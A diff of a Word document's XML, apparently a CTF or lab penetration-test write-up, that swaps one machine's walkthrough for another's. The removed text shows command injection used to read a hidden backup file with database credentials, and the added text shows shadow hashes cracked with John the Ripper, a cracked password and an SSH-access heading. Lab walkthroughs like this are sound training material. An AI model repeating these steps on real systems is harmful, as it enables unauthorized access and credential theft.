-                    <a:blip r:embed="rId14" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Discovering Sensitive Files</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Using the command injection vulnerability, further directories were explored.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Example payload:</w:t>
+        <w:t>Example entries:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7109,7 +7087,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>ls -all</w:t>
+        <w:t>office: $6$...</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7123,9 +7101,8 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>cd</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7137,9 +7114,9 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>dataCenter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7151,8 +7128,49 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t>: $6$...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:br/>
-        <w:t>ls -all</w:t>
+        <w:t>sky: $6$...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>sunset: $6$...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>space: $6$...</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7167,13 +7185,146 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
+          <w:noProof/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>This revealed a hidden file:</w:t>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32479FAB" wp14:editId="4370B979">
+            <wp:extent cx="5731510" cy="1017905"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="101789394" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="101789394" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1017905"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Password Cracking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">To obtain valid credentials, the extracted hashes were saved to a file and cracked using </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>John the Ripper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command used:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7208,7 +7359,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7220,9 +7370,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>.backup</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>john newpass.txt</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7237,119 +7386,31 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="134424D5" wp14:editId="62D4C25B">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="419480462" name="Picture 36"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="419480462" name="Picture 419480462"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>After running the attack using the wordlist, a password was successfully cracked.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Extracting Credentials</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The hidden backup file was read using command injection.</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7384,7 +7445,6 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7396,9 +7456,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>cat .backup</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>john newpass.txt --show</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7417,7 +7476,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The file contained database credentials:</w:t>
+        <w:t>Cracked credentials:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7443,6 +7502,8 @@
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -7450,6 +7511,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7461,84 +7523,21 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>username:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>sunset :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>jangow01</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>password:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>abygurl69</w:t>
+        <w:t xml:space="preserve"> cheer14</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7553,37 +7552,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>These credentials could potentially be used for authentication on other services.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8E05AD" wp14:editId="5C54FA72">
-            <wp:extent cx="5731510" cy="2781300"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE3279D" wp14:editId="39946B5E">
+            <wp:extent cx="5731510" cy="3258820"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1997204948" name="Picture 38"/>
+            <wp:docPr id="648711355" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -7591,17 +7566,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1997204948" name="Picture 1997204948"/>
+                    <pic:cNvPr id="648711355" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7609,7 +7578,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2781300"/>
+                      <a:ext cx="5731510" cy="3258820"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -7624,6 +7593,17 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:outlineLvl w:val="0"/>
         <w:rPr>
@@ -7650,7 +7630,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>FTP Access Using Discovered Credentials</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Gaining Initial Access via SSH</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7670,7 +7651,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Using the credentials obtained from the backup file, the FTP service was accessed.</w:t>
